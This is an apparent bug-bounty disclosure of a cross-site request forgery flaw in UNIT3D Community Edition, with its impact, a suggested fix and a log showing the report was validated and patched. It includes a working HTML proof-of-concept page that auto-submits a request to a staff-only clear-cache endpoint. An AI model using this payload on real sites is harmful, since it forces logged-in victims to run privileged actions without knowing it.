We've joined Protect AIJoin us over there for bounties up to $50,000+ for vulnerabilities in AI/ML repos

/

Cross-Site Request Forgery (CSRF) in hdinnovations/unit3d-community-edition

Valid

Reported on

Sep 24th 2021

Description

Attacker is able to run staff commands.

Proof of Concept

When you logged in open this POC.html in a browser. You can run staff only tools.

<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://unit3d.site/dashboard/commands/clear-cache">
    <input type="submit" value="Submit request" />
</form>
<script>
  document.forms[0].submit();
</script>
</body>
</html>

Impact

This vulnerability is capable of forging user to unintentional run staff only tools.

Test

Tested on Safari.

Fix

You should set a CSRF token on such GET requests or you can use POST instead of GET then because of cookie SameSite is Lax, request from other origins could not carry cookie.

Occurrences

web.php L736-L745

index.blade.php L34-L160

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 years ago

HDVinnie validated this vulnerability 2 years ago

HDVinnie has been awarded the disclosure bounty

The fix bounty is now up for grabs

HDVinnie marked this as fixed with commit bde1c7 2 years ago

HDVinnie has been awarded the fix bounty

This vulnerability will not receive a CVE

web.php#L736-L745 has been validated

index.blade.php#L34-L160 has been validated

to join this conversation

We have contacted a member of the hdinnovations/unit3d-community-edition team and are waiting to hear back 2 years ago

HDVinnie validated this vulnerability 2 years ago

HDVinnie has been awarded the disclosure bounty

The fix bounty is now up for grabs

HDVinnie marked this as fixed with commit bde1c7 2 years ago

HDVinnie has been awarded the fix bounty

This vulnerability will not receive a CVE

web.php#L736-L745 has been validated

index.blade.php#L34-L160 has been validated

to join this conversation